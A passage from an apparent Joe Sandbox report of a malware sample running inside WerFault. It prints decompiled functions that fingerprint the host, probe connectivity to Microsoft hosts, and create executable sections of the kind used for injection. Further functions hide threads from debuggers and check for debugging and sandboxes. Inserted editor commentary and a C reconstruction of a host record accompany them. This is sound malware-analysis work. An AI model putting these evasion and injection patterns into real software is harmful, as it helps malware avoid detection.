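Run it pinned to one core and compare the minimum gap with the number of tripped rounds: on bare metal the minimum is a few dozen cycles, and it is the occasional interrupt between the two reads, not a hypervisor, that causes most trips of a single-shot check like the sample's.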

                        C-Code - Quality: 37%
                        			E0286531A(void* __ecx, intOrPtr* __esi) {
                        				short _v8;
                        				char _v12;
                        				struct _SYSTEM_INFO _v48;
                        				intOrPtr _v100;
                        				intOrPtr _v108;
                        				char _v116;
                        				intOrPtr _v256;
                        				signed short _v260;
                        				signed int _v264;
                        				char _v268;
                        				char _v524;
                        				char _v788;
                        				void* _t60;
                        				short _t68;
                        				intOrPtr* _t69;
                        				void* _t70;
                        
                        				_t69 = __esi;
                        				if(__esi == 0 ||  *__esi != 0x160) { // the record must already carry its 0x160 size tag at +0
                        					return 0;
                        				} else {
                        					_v12 = 0xff; // size passed to the lookup that fills the 0x100-byte buffer below
                        					E028614DB(__ecx,  &_v524, 0, 0x100);
                        					E028614DB(__ecx,  &_v48, 0, 0x24);
                        					GetSystemInfo( &_v48); // executed -- processor count is read from here
                        					 *0x289f7fc( &_v116); // unresolved import; fields at +8 and +0x10 of the result are copied out below
                        					_v268 = 0x94; // 0x94 == sizeof(OSVERSIONINFOA); _v264/_v260/_v256 sit at +4/+8/+0xc, where that struct keeps major/minor/build
                        					 *0x289f80c( &_v268);
                        					 *0x289f810(0,  &_v524,  &_v12); // unresolved import (0, buffer, &size) filling the name buffer
                        					_t66 = _v264 & 0x0000ffff;
                        					 *((intOrPtr*)(__esi + 8)) = _v108;
                        					 *((intOrPtr*)(__esi + 0xc)) = _v100;
                        					 *(__esi + 0x14) = (_v260 & 0x0000ffff) << 0x00000010 | _v264 & 0x0000ffff; // (minor << 16) | major
                        					 *((intOrPtr*)(__esi + 0x18)) = _v256; // build number
                        					 *((intOrPtr*)(__esi + 0x10)) = 0;
                        					 *0x289f6a4(__esi + 0x60,  &_v524, 0x100); // copy the 0x100-byte name buffer to record+0x60
                        					 *((short*)(__esi + 4)) = _v48.dwNumberOfProcessors; // record+4: logical processor count, truncated to 16 bits
                        					_t68 = 0;
                        					_v8 = 0;
                        					do {
                        						E028614DB(_t66,  &_v788, 0, 0x104);
                        						_t60 =  *0x289fa84( &_v788, "HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\%u", _v8); // format the key path for index _v8
                        						_t70 = _t70 + 0xc;
                        						if(_t60 == 0) {
                        							goto L7;
                        						}
                        						if(E02862B90(_t66, 0x80000002,  &_v788) != 1) { // 0x80000002 == HKEY_LOCAL_MACHINE; stop at the first missing CentralProcessor\N key
                        							break;
                        						}
                        						_t68 = _t68 + 1;
                        						L7:
                        						_v8 = _v8 + 1;
                        					} while (_v8 < 0x20); // at most 32 indices are probed
                        					 *((short*)(_t69 + 2)) = _t68; // record+2: number of CentralProcessor subkeys found
                        					return 0x160; // the record size doubles as the success value
                        				}
                        			}

                        APIs
                        • GetSystemInfo.KERNEL32(?,?,00000000,00000024,?,00000000,00000100,00000000,00000160), ref: 02865366
                        Strings
                        • , xrefs: 02865433
                        • HARDWARE\DESCRIPTION\System\CentralProcessor\%u, xrefs: 02865407
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: InfoSystem
                        • String ID: $HARDWARE\DESCRIPTION\System\CentralProcessor\%u
                        • API String ID: 31276548-109395992
                        • Opcode ID: c8f324d3675a8258bedd9e96f6e71f8b1d815199a18bb92d2a6b67f2bb080f04
                        • Instruction ID: 173c81efc8e4c1ec4ea79d1c30be831885095ade5ce846f74503a29904f483f4
                        • Opcode Fuzzy Hash: c8f324d3675a8258bedd9e96f6e71f8b1d815199a18bb92d2a6b67f2bb080f04
                        • Instruction Fuzzy Hash: 88310279D0021D9BDB24DFA4CC88AEEB7FCEF08304F5488AAE559E3541D7749A858B20
                        Uniqueness

                        Uniqueness Score: -1.00%
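As an added example (editor-written; not code from the sample or from Joe Sandbox), the 0x160-byte record that E0286531A above fills, reconstructed from the offsets in the decompiled writes so its layout can be checked against a memory dump. The Windows calls are replaced by caller-supplied values and a callback: `num_processors` stands in for `SYSTEM_INFO.dwNumberOfProcessors`, the major/minor/build arguments for the three fields read at +4/+8/+0xc of the 0x94-byte structure (the size of OSVERSIONINFOA), and `exists(i)` for the registry probe of `HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\<i>`. The fields at +8 and +0xc come from an import the page does not resolve and are left zero here; the string copied to +0x60 is whatever the unresolved `(0, buffer, &size)` call returned, fed in as `host_name`. All sample inputs below are constructed.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define HOST_RECORD_SIZE 0x160   /* tag at +0 and return value of E0286531A */
#define MAX_CPU_KEYS     0x20    /* loop bound in the sample */
#define NAME_OFFSET      0x60
#define NAME_LEN         0x100

typedef int (*cpu_key_exists_fn)(unsigned index);

/* Little-endian field access, so the record bytes match an x86 dump. */
void     put16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
void     put32(uint8_t *p, uint32_t v) { put16(p, (uint16_t)v); put16(p + 2, (uint16_t)(v >> 16)); }
uint16_t get16(const uint8_t *p)       { return (uint16_t)(p[0] | (p[1] << 8)); }
uint32_t get32(const uint8_t *p)       { return get16(p) | ((uint32_t)get16(p + 2) << 16); }

/* Mirrors the registry loop: indices 0..0x1f, stop at the first index whose
 * CentralProcessor\N key is missing, so a gap hides every key after it. */
unsigned count_cpu_keys(cpu_key_exists_fn exists)
{
    unsigned n = 0;
    for (unsigned i = 0; i < MAX_CPU_KEYS; i++) {
        if (!exists(i)) break;
        n++;
    }
    return n;
}

/* Fills the record. Like the sample it refuses a NULL record or one that does
 * not already carry the 0x160 tag (returns 0); otherwise it returns 0x160. */
unsigned build_host_record(uint8_t *rec, uint16_t num_processors,
                           uint32_t os_major, uint32_t os_minor, uint32_t os_build,
                           const char *host_name, cpu_key_exists_fn exists)
{
    if (rec == NULL || get16(rec) != HOST_RECORD_SIZE) return 0;

    put32(rec + 0x08, 0);                       /* from the unresolved import: not reconstructed */
    put32(rec + 0x0c, 0);
    put32(rec + 0x10, 0);                       /* the sample writes 0 here */
    put32(rec + 0x14, ((os_minor & 0xffffu) << 16) | (os_major & 0xffffu)); /* (minor << 16) | major */
    put32(rec + 0x18, os_build);
    memset(rec + NAME_OFFSET, 0, NAME_LEN);     /* sample zeroes 0x100 bytes, then copies 0x100 */
    strncpy((char *)rec + NAME_OFFSET, host_name ? host_name : "", NAME_LEN - 1);
    put16(rec + 0x04, num_processors);          /* dwNumberOfProcessors, truncated to 16 bits */
    put16(rec + 0x02, (uint16_t)count_cpu_keys(exists)); /* written last, as in the sample */
    return HOST_RECORD_SIZE;
}

/* Constructed registry shapes for the demonstration. */
int sample_keys_four(unsigned i) { return i < 4; }           /* CentralProcessor\0..3 present */
int sample_keys_gap(unsigned i)  { return i != 2 && i < 6; } /* \2 missing: the count stops at 2 */
int sample_keys_all(unsigned i)  { (void)i; return 1; }      /* every index answers: capped at 0x20 */

uint8_t demo_record[HOST_RECORD_SIZE];

/* Builds one record from constructed values: version 6.1 build 7601, 8 logical
 * processors, four CentralProcessor keys, host name "WIN7-BOX". */
unsigned demo_build(void)
{
    memset(demo_record, 0, sizeof demo_record);
    put16(demo_record, HOST_RECORD_SIZE);       /* the caller supplies the tag, as the sample expects */
    return build_host_record(demo_record, 8, 6, 1, 7601, "WIN7-BOX", sample_keys_four);
}

int main(void)
{
    if (demo_build() != HOST_RECORD_SIZE) return 1;
    printf("cpu keys=%u processors=%u os=%u.%u build=%u name=%s\n",
           get16(demo_record + 0x02), get16(demo_record + 0x04),
           get32(demo_record + 0x14) & 0xffff, get32(demo_record + 0x14) >> 16,
           get32(demo_record + 0x18), (const char *)demo_record + NAME_OFFSET);
    return 0;
}
```

The two counts at +2 and +4 are not redundant: one comes from the registry walk and one from GetSystemInfo, and a sandbox that fakes one without the other leaves a mismatch in the record.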

                        C-Code - Quality: 82%
                        			E02870D19(void* __ecx, void* __eflags) {
                        				signed int _v8;
                        				intOrPtr _v12;
                        				char* _v16;
                        				char* _v20;
                        				char* _v24;
                        				void* __esi;
                        				signed int _t16;
                        				intOrPtr* _t21;
                        				void* _t22;
                        				void* _t24;
                        				signed int _t29;
                        				void* _t34;
                        				intOrPtr* _t36;
                        				void* _t38;
                        
                        				_t34 = 0;
                        				_v8 = _v8 & 0;
                        				_v24 = "update.microsoft.com"; // connectivity probe: one of these three well-known hosts is picked per call
                        				_v20 = "microsoft.com";
                        				_v16 = "windowsupdate.microsoft.com";
                        				_v12 = 0x289240d;
                        				_t16 = E0286181B(__ecx); // reduced modulo 3 below to choose the host
                        				_t29 = 3;
                        				_t33 =  *((intOrPtr*)(_t38 + _t16 % _t29 * 4 - 0x14));
                        				if(E028619D6( *((intOrPtr*)(_t38 + _t16 % _t29 * 4 - 0x14))) != 0) {
                        					_t21 = E0288524A(_t33,  &_v8); // executed
                        					_t36 = _t21;
                        					if(_t36 == 0) {
                        						L9:
                        						_t22 = 0;
                        						L10:
                        						return _t22;
                        					}
                        					if(_v8 > 0) {
                        						_t34 =  *0x289fd84( *_t36);
                        					}
                        					E02885420(_t36);
                        					if(_t34 == 0) {
                        						goto L9;
                        					} else {
                        						_t24 = E0288575C(_t34, 0x50); // executed -- 0x50 == 80, the HTTP port
                        						if(_t24 >= 1) {
                        							E02885655(_t24, _t24); // executed
                        						}
                        						_t22 = 1;
                        						goto L10;
                        					}
                        				}
                        				return 0;
                        			}

                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: LCT$microsoft.com$update.microsoft.com$windowsupdate.microsoft.com
                        • API String ID: 0-2508637785
                        • Opcode ID: 928d1d7e7f9f49d0d88edd3365f55eb904537b890ccdf46833f86fd70987c818
                        • Instruction ID: 46a5fd78efcde69d81bf1bfa924af71f856603fff2666f954ba4d4b9d3dbc6e1
                        • Opcode Fuzzy Hash: 928d1d7e7f9f49d0d88edd3365f55eb904537b890ccdf46833f86fd70987c818
                        • Instruction Fuzzy Hash: 9001DDBDA40304ABCF10BEA8C5085AF7BBB9F81708F1445559514E3345DB75FA059A51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 02863D76
                        • AdjustTokenPrivileges.KERNELBASE(00000001,00000000,00000001,00000010,00000000,00000000), ref: 02863DA7
                        • FindCloseChangeNotification.KERNEL32(00000001), ref: 02863DB4 (in kernel32 this export shares its implementation with CloseHandle, which is why disassemblers often show this name for a plain CloseHandle call; here it closes the handle after the privilege adjustment)
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: AdjustChangeCloseFindLookupNotificationPrivilegePrivilegesTokenValue
                        • String ID:
                        • API String ID: 3056834404-0
                        • Opcode ID: 9b56118488ad7c0e55c176774fbc4f52732c1935990427f69ccde44ead655825
                        • Instruction ID: 804a6885c555924c461bcf772b2c9b9957cdd19ae00323ec317e93533c8b9f41
                        • Opcode Fuzzy Hash: 9b56118488ad7c0e55c176774fbc4f52732c1935990427f69ccde44ead655825
                        • Instruction Fuzzy Hash: E8014CBD900209FFDB10DFA0CD89AFE7BBDEB04758F2444A8F506E5081D775AA549B60
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02880D68(intOrPtr _a4, signed short* _a8) {
                        				signed int _v8;
                        				intOrPtr _v12;
                        				signed int _v16;
                        				signed int _v20;
                        				void* _v24;
                        				signed int _v28;
                        				void* _v36;
                        				signed short _v40;
                        				signed int _v44;
                        				signed int _v48;
                        				signed int _v52;
                        				signed int _v56;
                        				signed int _v60;
                        				signed int _v64;
                        				void* _v68;
                        				signed char _v69;
                        				long _t108;
                        				signed int _t116;
                        				signed int _t121;
                        
                        				if(_a4 == 0) {
                        					L6:
                        					return 0;
                        				}
                        				if(_a8 == 0 || ( *_a8 & 0x0000ffff) != 0x12) {
                        					_v69 = 1;
                        				} else {
                        					_v69 = 0;
                        				}
                        				if((_v69 & 0x000000ff) != 1) {
                        					if(_a8[3] != 0) {
                        						_v20 = _v20 & 0x00000000;
                        						_v28 = _v28 & 0x00000000;
                        						_v16 = _v16 & 0x00000000;
                        						_v44 = _v44 & 0x00000000;
                        						_v24 = _v24 & 0x00000000;
                        						_v8 = _v8 & 0x00000000;
                        						_v40 = _a8[3] + 0xff;
                        						_v12 = _a8[3] + 0xff;
                        						_v68 = 0x18;
                        						_v64 = _v64 & 0x00000000;
                        						_v56 = _v56 & 0x00000000;
                        						_v60 = _v60 & 0x00000000;
                        						_v52 = _v52 & 0x00000000;
                        						_v48 = _v48 & 0x00000000;
                        						E02861807( &_v36, 8);
                        						_v36 = _v40;
                        						_t108 = NtCreateSection( &_v24, 0xf001f,  &_v68,  &_v36, 0x40, 0x8000000, 0); // executed
                        						_v8 = _t108;
                        						if(_v8 < 0 || _v24 == 0) {
                        							goto L25;
                        						} else {
                        							if(_a8[7] != 0) {
                        								_v28 = _a8[7];
                        							}
                        							_t116 = L02887A4C(_v24, _a4,  &_v28, 0, 0, 0,  &_v40, 2, 0, 0x40); // executed
                        							_v8 = _t116;
                        							if(_v8 < 0 || _v28 == 0 || _v40 < _v12) {
                        								goto L25;
                        							} else {
                        								if(_a8[5] != 0) {
                        									_v16 = _a8[5];
                        								}
                        								_t121 = L02887A4C(_v24, 0xffffffff,  &_v16, 0, 0, 0,  &_v40, 2, 0, 0x40); // executed
                        								_v8 = _t121;
                        								if(_v8 < 0 || _v16 == 0 || _v40 < _v12) {
                        									L25:
                        									if(_v28 != 0) {
                        										L02887AE2(_a4, _v28);
                        									}
                        									if(_v16 != 0) {
                        										L02887AE2(0xffffffff, _v16);
                        									}
                        									if(_v24 != 0) {
                        										NtClose(_v24); // executed
                        									}
                        									return 0;
                        								} else {
                        									_a8[1] = _v24;
                        									_a8[5] = _v16;
                        									_a8[7] = _v28;
                        									_a8[3] = _v40;
                        									return 1;
                        								}
                        							}
                        						}
                        					}
                        					return 0;
                        				} else {
                        					goto L6;
                        				}
                        			}

                        APIs
                        • NtCreateSection.NTDLL(00000000,000F001F,00000018,?,00000040,08000000,00000000,?,00000008), ref: 02880E29
                        • NtClose.NTDLL(00000000), ref: 02880F31
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseCreateSection
                        • String ID:
                        • API String ID: 3832541453-0
                        • Opcode ID: 9aa940937458c179bf9dd7c1836f132410bcc8a7685f2e9f6f82fb412ef02b7e
                        • Instruction ID: 5b4c3ec1cf7f8d8b03e240fe6ad47c2712479885facfdb1f4f1a920660b24cbd
                        • Opcode Fuzzy Hash: 9aa940937458c179bf9dd7c1836f132410bcc8a7685f2e9f6f82fb412ef02b7e
                        • Instruction Fuzzy Hash: 8061F379904208EFEF20DF98C849BEDB7F1EB0431AF248455E914EA2D1D374AA88CF55
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 43%
                        			E028660AA(long _a4) {
                        				void* __esi;
                        				long _t22;
                        				long _t27;
                        				intOrPtr _t28;
                        				intOrPtr _t31;
                        				intOrPtr _t34;
                        				intOrPtr* _t38;
                        
                        				_t38 = _a4;
                        				if(_t38 == 0 ||  *_t38 != 0x90) {
                        					return 0;
                        				}
                        				if(( *(_t38 + 8) & 0x00000080) == 0) {
                        					_push(0x4d2);
                        				} else {
                        					_push(0);
                        				}
                        				 *0x289f968( *0x289ec4a);
                        				NtSetInformationThread(0xfffffffe, 0x11, 0, 0); // executed
                        				if(E028658DC(_t38) != 0) {
                        					_t22 =  *((intOrPtr*)( *((intOrPtr*)(_t38 + 0x84))))(_t38); // executed
                        					_a4 = _t22;
                        					if(( *(_t38 + 8) & 0x00000020) != 0) {
                        						_t34 =  *((intOrPtr*)(_t38 + 0x10));
                        						if(_t34 != 0) {
                        							_t28 =  *((intOrPtr*)(_t38 + 0xc));
                        							if(_t28 == 0) {
                        								_t28 = 4;
                        							}
                        							_push(_t28);
                        							_push(_t34);
                        							if( *0x289f71c() == 0) {
                        								E028617E4( *((intOrPtr*)(_t38 + 0x10)));
                        							}
                        						}
                        					}
                        					E02865815(_t38);
                        					E028617E4(_t38);
                        					 *0x289f968( *0x289ec4a, 0x4d2);
                        					NtTerminateThread(0xfffffffe, _a4); // executed
                        					_t27 = _a4;
                        					goto L17;
                        				} else {
                        					_t31 =  *((intOrPtr*)(_t38 + 0x78));
                        					if(_t31 != 0) {
                        						 *0x289f824(_t31);
                        					}
                        					E028617E4(_t38);
                        					_t27 = 0;
                        					L17:
                        					return _t27;
                        				}
                        			}

                        APIs
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000), ref: 028660ED
                        • NtTerminateThread.NTDLL(000000FE,00000020), ref: 02866168
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: Thread$InformationTerminate
                        • String ID:
                        • API String ID: 1058300421-0
                        • Opcode ID: 1690f5bee76e77b855fb5de9a9ea00daf5687c36b0eee3ed68f14cbeb689082b
                        • Instruction ID: 8fc214ea4382485bfe47b77bca1c697e1b38ecc6355af2bef50c0797430b5731
                        • Opcode Fuzzy Hash: 1690f5bee76e77b855fb5de9a9ea00daf5687c36b0eee3ed68f14cbeb689082b
                        • Instruction Fuzzy Hash: 7721233CA00361BBDB205B34DC4CBBA7BA8AF11714F184929FA46E25D2EB24D440CB51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E028644F0(void* _a4) {
                        				long _v8;
                        				void _v12;
                        				intOrPtr _v16;
                        				intOrPtr _v20;
                        				void _v44;
                        				long _t22;
                        				long _t25;
                        				void* _t27;
                        
                        				if(_a4 == 0) {
                        					L9:
                        					return 1;
                        				}
                        				_v8 = 0;
                        				_v12 = 0;
                        				E028614DB(_t27,  &_v44, 0, 0x20);
                        				_t22 = NtQueryInformationProcess(_a4, 0x14,  &_v12, 4,  &_v8); // executed
                        				if(_t22 < 0 || _v8 == 0) {
                        					goto L9;
                        				} else {
                        					_t25 = NtQueryInformationProcess(_a4, 4,  &_v44, 0x20,  &_v8); // executed
                        					if(_t25 < 0 || _v8 == 0 || _v16 != 0 || _v20 >= 0x3e8 || _v12 >= 3) {
                        						goto L9;
                        					} else {
                        						return 0;
                        					}
                        				}
                        			}

                        APIs
                        • NtQueryInformationProcess.NTDLL(00000208,00000014,00000208,00000004,00000002,00000478,00000000,00000020,00000208,00000478,?,0000002A,?,00000012,?,00000208), ref: 0286451F
                        • NtQueryInformationProcess.NTDLL(00000020,00000004,?,00000020,?), ref: 0286453D
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: InformationProcessQuery
                        • String ID:
                        • API String ID: 1778838933-0
                        • Opcode ID: e3f2ab6aca43d8bb4e03a585093e4cb066bd86f9a85a7244a90e997b8008846c
                        • Instruction ID: 31b1c9a85c74328495a4b9ee528a4d769e94666b45d75fdb24a397027bcbea68
                        • Opcode Fuzzy Hash: e3f2ab6aca43d8bb4e03a585093e4cb066bd86f9a85a7244a90e997b8008846c
                        • Instruction Fuzzy Hash: D801DBB9A41318FBDB21DAA4C84CEEDBABCAB45B45F044066F605E10A0D3709784DB99
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 66%
                        			E02864E69(void* __ebx, void* __ecx, void* __esi, void* _a4) {
                        				long _v8;
                        				long _v12;
                        				intOrPtr _t13;
                        				long _t16;
                        				intOrPtr _t18;
                        				void* _t28;
                        
                        				_push(__ecx);
                        				_push(__ecx);
                        				if(_a4 == 0 || __ebx == 0) {
                        					_t13 = 0;
                        				} else {
                        					if(( *0x289fdc8 & 0x00000081) != 0) {
                        						_t13 = E02864DEF(__ecx, _a4, __ebx);
                        					} else {
                        						_v8 = 0;
                        						_v12 = 0;
                        						_t28 = E0286161B(0x828);
                        						if(_t28 != 0) {
                        							_t16 = NtQueryInformationProcess(_a4, 0x2b, _t28, 0x826,  &_v8); // executed
                        							if(_t16 >= 0 && _v8 != 0) {
                        								_t18 =  *((intOrPtr*)(_t28 + 4));
                        								if(_t18 != 0 &&  *_t28 != 0) {
                        									 *0x289f6a4(__ebx, _t18, 0x103);
                        									_v12 = E028619E8(__ebx);
                        								}
                        							}
                        							E028617E4(_t28);
                        						}
                        						_t13 = _v12;
                        					}
                        				}
                        				return _t13;
                        			}

                        APIs
                        • NtQueryInformationProcess.NTDLL(00000208,0000002B,00000000,00000826,00000002,00000828,00000208,00000000,?,?,?,02881C96,00000000,00000000,00000000,00000000), ref: 02864EA9
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: InformationProcessQuery
                        • String ID:
                        • API String ID: 1778838933-0
                        • Opcode ID: 1b6e86fbc88d226a2e1b2c2f0589507a07d961727f77c4e4ef068169fbf18fe1
                        • Instruction ID: 14c3954fc0257f92f67475c2be83fd27daa7f8ba2449c3f374000e3d5df7fd80
                        • Opcode Fuzzy Hash: 1b6e86fbc88d226a2e1b2c2f0589507a07d961727f77c4e4ef068169fbf18fe1
                        • Instruction Fuzzy Hash: 8B01D63CE00608BEDB319FE8DC8C8BFBAA9EF50764F144516E909D6181EB718990C791
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • GetTimeZoneInformation.KERNEL32(?), ref: 0286572B
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: InformationTimeZone
                        • String ID:
                        • API String ID: 565725191-0
                        • Opcode ID: c3d885d375f23a1ac400ea88653ff46532f0239dbf17df5e04105255879a186f
                        • Instruction ID: 20176902eab891130aad1bcb4bdb744210187fac3cd42f39596677fff6dc11e5
                        • Opcode Fuzzy Hash: c3d885d375f23a1ac400ea88653ff46532f0239dbf17df5e04105255879a186f
                        • Instruction Fuzzy Hash: B601D72DD1030ADACB209FE0D1086EEB3F8AF18704F10995AE969E3A50E3349646CB65
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E028644A2(void* __ecx, void* _a4) {
                        				long _v8;
                        				void _v12;
                        				void* _t11;
                        				long _t14;
                        
                        				if(_a4 == 0) {
                        					L6:
                        					_t11 = 0;
                        				} else {
                        					if(( *0x289fdc8 & 0x00000200) != 0) {
                        						_v8 = 0;
                        						_v12 = 0;
                        						_t14 = NtQueryInformationProcess(_a4, 0x1a,  &_v12, 4,  &_v8); // executed
                        						if(_t14 < 0 || _v8 == 0 || _v12 == 0) {
                        							goto L6;
                        						} else {
                        							goto L2;
                        						}
                        					} else {
                        						L2:
                        						_t11 = 1;
                        					}
                        				}
                        				return _t11;
                        			}

                        APIs
                        • NtQueryInformationProcess.NTDLL(028637B0,0000001A,028637B0,00000004,00000000,-0000000C,?,?,?,028637B0,00000000), ref: 028644D5
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: InformationProcessQuery
                        • String ID:
                        • API String ID: 1778838933-0
                        • Opcode ID: 5abba021619374e66330001b7d88922c74be93bc38469fe57dd319c738758ffe
                        • Instruction ID: 7432b06f9bafc72ebe1c0875298c8d23b1059ce351a60db27721de42978380f9
                        • Opcode Fuzzy Hash: 5abba021619374e66330001b7d88922c74be93bc38469fe57dd319c738758ffe
                        • Instruction Fuzzy Hash: 17F0547D902318FFDB31CE90D84AABEB668EB04B48F14856AFA05D1880D3709690D690
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02864D45(void* _a4) {
                        				long _v12;
                        				intOrPtr _v32;
                        				void _v36;
                        				long _t14;
                        				void* _t16;
                        
                        				_v12 = _v12 & 0x00000000;
                        				if(_a4 == 0) {
                        					L3:
                        					return 0;
                        				}
                        				E028614DB(_t16,  &_v36, 0, 0x18);
                        				_t14 = NtQueryInformationProcess(_a4, 0,  &_v36, 0x18,  &_v12); // executed
                        				if(_t14 < 0) {
                        					goto L3;
                        				}
                        				return _v32;
                        			}

                        APIs
                        • NtQueryInformationProcess.NTDLL(00000000,00000000,?,00000018,00000000,?,00000000,00000018,?,?,02864DB9,00000000,?,00000000,000001DC), ref: 02864D71
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: InformationProcessQuery
                        • String ID:
                        • API String ID: 1778838933-0
                        • Opcode ID: dd8fae4819747bd1a973d9e086d2619f3e10170bd284d842d11425f87f877d6d
                        • Instruction ID: b6aeb26c20390329fba7e4d138b66137b7cac2c3b917fe0d63bb2fa256d57886
                        • Opcode Fuzzy Hash: dd8fae4819747bd1a973d9e086d2619f3e10170bd284d842d11425f87f877d6d
                        • Instruction Fuzzy Hash: BDE03979A4020CAAEB11DAA4CC49FFE76BCAB04748F008020E601E90C0D774E6848BA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02865BED(void* __ecx, void* _a4) {
                        				void _v8;
                        				long _t10;
                        
                        				_v8 = _v8 | 0xffffffff;
                        				if(_a4 == 0) {
                        					return 0;
                        				}
                        				_t10 = NtSetInformationThread(_a4, 3,  &_v8, 4); // executed
                        				return 0 | _t10 > 0x00000000;
                        			}

                        APIs
                        • NtSetInformationThread.NTDLL(00000000,00000003,000000FF,00000004,?,?,0288448C,00000000,?,?,0286DF35,0286E0E2), ref: 02865C06
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
